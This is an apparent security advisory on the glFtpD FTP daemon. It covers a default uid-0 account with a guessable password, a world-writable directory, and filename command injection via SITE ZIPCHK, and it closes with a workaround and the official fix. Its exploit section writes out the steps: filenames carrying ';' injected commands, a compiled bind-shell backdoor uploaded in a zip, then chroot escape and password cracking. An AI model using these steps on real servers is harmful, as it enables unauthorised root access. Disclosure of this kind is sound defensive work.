glFtpD is an FTP daemon available from www.glftpd.org. Although it's a beta release, it is in wide use across the Internet.
glFtpD is a somewhat attractive choice for many non-technically minded people since it is simple to install and runs fine on the default configuration. It runs on Linux, FreeBSD and Solaris.
glFtpD is also quite packed with "features" such as the ability to script add-ons in tcl, and more. With such a large amount of features it appears that the attention paid to security has suffered somewhat during development.
By default glFtpD installs a user account on your new FTP server called "glftpd" the password of this user is predictably "glftpd".
This default user also has a UID of 0. This means that users FTP'ing to your machine have uid == 0 (meaning, root). It is not a very good idea to leave it that way.
2) World writeable site directory:
By default, your new ftp servers ~/site directory is world writeable.
3) SITE ZIPCHK command:
The SITE command ZIPCHK can be used to check the validity of a ZIP file on the server. Presumably this is so you can make sure the ZIP file you are about to download is valid and free from error. The way this works is as follows:
ftp> quote SITE ZIPCHK XXXXX.ZIP
glFtpD then runs a shell script with XXXXX.ZIP as argv[1] or 2, which calls /bin/unzip.
If a user is able to create a filename with ";" characters in the name, they can execute arbitrary code on the remote server with the privileges of the server.
Exploit Information:
1) & 2) are traditionally bad and the exploit is obvious.
3) This is quite simple. A user need only have some place to upload files:
- You will need to build some kind of backdoor to allow you access, using bindshell.c
$ gcc bindshell.c -o b -static
- Create an empty file called " ; bash blah;"
- Create an empty file called " ; unzip blah;"
$ > ";bash blah;"
- Create a script called "blah" :
$ cat > blah
#!/bin/bash
./b &
^D
- "ZIP" these files up.
$ zip blah.zip blah b
- Login to your FTP server. Now upload your files:
ftp> put blah.zip
ftp> put " ; bash blah;"
ftp> put " ; unzip blah.zip;"
- Because glFtpD attempts to convert spaces in filenames to underscores, you'll need to rename them back.
- glFtpD will spit out an error message. Ignore it. Now telnet to the port defined within bindshell.c (you have now effectively compromised the server).
- Once you're inside, if you attacked the glftpd account (or any uid = 0 account), you may use the simple chroot() breaking techniques ( http://www.suid.kg/source/breakchroot.c ) to have run of the entire box.
- If you do not have a uid == 0 account. You'll probably be in a chroot environment and you don't really have a way out except to:
- check /etc/passwd (really $GLFTPDHOME/etc/passwd)
- Crack a uid == 0 passwd, maybe the glftpd account is still in there
- Use your imagination.
Workaround:
Easy fix should be override the command in glftpd.conf (or equivalent) with something like:
site_cmd ZIPCHK TEXT /ftp-data/misc/disabled
Which causes a text file to be displayed rather then a command executed.
The fix (official one) from glFtpD developers GreyLine and Usurper is to add:
"path-filter * /ftp-data/misc/pathmsg ^[-A-Za-z0-9_.()[:space:]]*$ ^\.^-"
To the config file.
